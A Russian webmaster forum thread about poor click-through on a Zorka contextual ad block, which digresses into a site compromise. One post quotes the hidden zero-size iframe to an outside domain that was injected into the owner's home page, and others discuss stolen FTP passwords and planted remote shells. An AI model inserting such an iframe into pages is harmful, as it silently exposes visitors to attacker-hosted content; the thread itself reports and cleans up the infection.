Реклама на зорьке

12
merkush
На сайте с 17.03.2010
60
1403

Поставил блок контекстной рекламы на сайте http://www.aquarion.ru/ переходов по страницам примерно 1500 в сутки. 1 день 4 клика 2 день 1 клик, 3й день 1 клик, сегодня 4й день 0. Средний ctr выдает 0.08. Это нормально или что то не так.

Роман Викторович.
Dreammaker
На сайте с 20.04.2006
569

Хром пишет, что посещение этого сайта может принести вред компьютеру.

merkush
На сайте с 17.03.2010
60

Я уже это исправил. Как то вчера на главную страницу сайта попал вот этод код <iframe src="http://lomahhs.net/index.php?" width="0" height="0" frameborder="0"></iframe>и гугл объявил сайт как опасный. Код я уже удалил и отправил гуглу запрос о повторной проверке.

Как код попал на сайт непойму?

Dreammaker
На сайте с 20.04.2006
569

merkush, скорее всего троян украл у вас пароли от фтп.

merkush
На сайте с 17.03.2010
60

Скорее всего да. Я уже их сменил. Как интересно долго будет после запроса на повторное индексирование гугл держать сайт как опасный при запросах.

А как насчет контекстной рекламы. При 1200 просмотров страниц 1 или 0 кликов про рекламе в блоке с пятью выводными ракламными сайтами это нормальное явление или это мало?

eis
На сайте с 18.10.2008
473
eis

Попробуйте рекламные блоки расставить в начале материала, в конце. Проанализируйте как лучше и сделайте так :)

- Здесь я покупаю вечные ссылки на свои сайты! (https://backlinkator.com) - сотни ссылок за копейки
merkush
На сайте с 17.03.2010
60

Гугл уже снял с сайта предупреждение об опасности сайта. Не прошло и 24 часа.

Разместить несколько блоков не получается. у гугла в Google AdSense сайт уже давно забанен без всяких на то объяснений, яндекс с 1го раза отклонил просьбу о размещении их блока рекламы, написал (обратиться через месяц), а зорька, рекламу которой я разместил, по правилам разрешает лишь 1 блок рекламы на 1 странице сайта.

Лилия Р
На сайте с 10.12.2009
30

Если изначально вопрос звучит как "Реклама на зорьке", то по моим наблюдениям зорька мало даёт (возможно она не очень привлекательнв для посетителей сайтов), я её сняла. Поставила другие рекламы контекстные.

mnt
На сайте с 11.11.2002
107
mnt
merkush:
Скорее всего да. Я уже их сменил. Как интересно долго будет после запроса на повторное индексирование гугл держать сайт как опасный при запросах.

маловероятно что код этот залили через ftp.

99% что у вас дырка на сайте в скриптах и вам уже залили ремоут шелл + подправили ваши же скрипты добавив туда дырки для последующих атак.

И через некоторое время снова зальют эту заразу.

Смотрите log на предмет заливки эксплойта, шерстите весь код + наличие непонятных/не ваших скриптов иначе не избавитесь.

дорого куплю ссылки с хороших жирных русскоязычных авто сайтов.
SlavMix
На сайте с 02.03.2009
64
лишь 1 блок рекламы на 1 странице сайта

Ну-ну... В Зорьке можно размещать сколько угодно блоков.

shmelina
На сайте с 12.09.2005
168
merkush:
а зорька, рекламу которой я разместил, по правилам разрешает лишь 1 блок рекламы на 1 странице сайта.

можете хоть 10 блоков повесить, напишите в личку, дам несколько советов.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий